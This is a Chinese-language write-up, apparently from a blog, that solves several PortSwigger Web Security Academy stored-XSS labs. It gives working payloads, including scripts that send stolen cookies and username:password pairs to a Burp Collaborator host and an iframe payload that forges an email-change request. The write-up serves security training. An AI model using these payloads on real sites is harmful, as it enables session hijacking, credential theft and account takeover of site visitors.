Portswigger-web-security-academy:stored_xss

stored_xss

Stored XSS into HTML context with nothing encoded

  • 题目要求

    提交评论,调用alert函数

  • 解题过程

    直接祖传payload就行

Stored XSS into anchor href attribute with double quotes HTML-encoded

  • 题目描述

    评论功能点有存储型xss

    要求当author name被点击的时候调用alert函数

  • 解题过程

    <p>
    	<img src="/resources/images/avatarDefault.svg" class="avatar">                     <a id="author" href="https://test.test">name</a> | 24 May 2020
    </p>
    

    随便输个链接测试一下,发现输入的website被直接嵌入到了href

    构造payload:javascript:alert()

Stored DOM XSS

  • 题目描述

    评论功能点有存储型dom-xss,调用alert函数即可

  • 解题过程

    关键代码

    function escapeHTML(html) {
            return html.replace(‘<‘, ‘&lt;‘).replace(‘>‘, ‘&gt;‘);
    }
    let newInnerHtml = firstPElement.innerHTML + escapeHTML(comment.author)
    

    注意这里的escapeHTML函数的定义,使用了replace函数,js的replace函数有个特性,只会替换最开始出现的一个字符,所以

    构造payload:<><img src=x onerror=alert()>

Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped

  • 题目描述

    评论功能点有存储型xss

    要求当author name被点击的时候调用alert函数

  • 解题过程

    这是上上道题的升级版,<>"会被HTML编码,\会被addslash

    关键代码

    <a id="author" href="https://aaaaa\‘&quot;`\\" onclick="var tracker={track(){}};tracker.track(‘https://aaaaa\‘&quot;`\\‘);">asd</a>
    

    可以看到website直接被嵌入到了hrefonclick,因为后端检测了url格式,所以href无法进行xss

    onclick,考虑如何闭合引号,注意到这里是html+js环境,所以可以使用HTML实体编码/unicode编码,但是\会被addslash,所以只能用HTML实体编码

    构造payload:http://xss&#39;-alert()-&#39;

    这里涉及到一个js的知识点,eval(‘xss‘-alert()会弹窗,即js语境中,字符串与语句进行运算,会执行语句

Exploiting cross-site scripting to steal cookies

  • 题目描述

    博客评论点有存储型xss

    要求盗取cookie并模拟被盗者身份

  • 解题步骤

    这道题要用到Burp Collaborator,这是一个burp自带的测试工具,贴一篇介绍

    简单来说就是一个用来接收并返回数据的接口,类似于自己搭的vps接收cookie

    构造payload:

    <script>
    fetch(‘https://xxxxxx.burpcollaborator.net‘,{
    method:‘post‘,
    body:document.cookie
    });
    </script>
    

    放到评论区,然后在Burp Collaborator Clientpoll一下拿到cookie,再替换掉自己的cookie就可以

Exploiting cross-site scripting to capture passwords

  • 题目描述

    在博客评论点有存储型xss

    要求盗取usernamepassword并登录

  • 解题过程

    这道题参考了官方的solution,没有过盗取usernamepassword的思路

    <input name=username id=username>
    <input type=password name=password onchange="if(this.value.length)fetch(‘https://4glwxnk77bznm13y44j75a137udl1a.burpcollaborator.net‘,{
    method:‘POST‘,
    mode: ‘no-cors‘,
    body:username.value+‘:‘+this.value
    });">
    

    payload利用了usernamepassword接口,在用户访问页面时自动填写,这里有点脑洞题的感觉,因为这里的赋值是需要后台进行渲染,或者通过get传值的。

    但payload思路可以借鉴

Exploiting XSS to perform CSRF

  • 题目描述

    在评论点有存储型xss

    要求修改查看评论的用户的邮件地址

  • 解题过程

    先登录给的账号,修改email,用burp看下数据包

    关键部分

    POST /email/change-email HTTP/1.1
    Host: accf1faa1fa54c128098504e00910043.web-security-academy.net
    Connection: close
    Content-Length: 58
    Origin: https://accf1faa1fa54c128098504e00910043.web-security-academy.net
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: session=hVm5TBng8eVK17OV1ulcF6IP5xbwzcu4
    
    email=aaaa%40bbb.ccc&csrf=aIMl9DOIMdHZQ4qsl05r4dERRyrRzFm6
    

    这里需要一个csrf token,所以要用到iframe

    构造payload:(可行)

    <iframe src=‘https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email‘ name=‘xxx‘  onload="
    var csrf = window.frames[‘xxx‘].document.getElementsByName(‘csrf‘)[0].value;
    fetch(‘https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email/change-email‘,{
    method:‘post‘,
    body:‘email=aaa@bbb.ccc&csrf=‘+csrf
    });">
    </iframe>
    

Portswigger-web-security-academy:stored_xss

上一篇:数据库系统世界


下一篇:Ubuntu下MySQL忘记root密码重置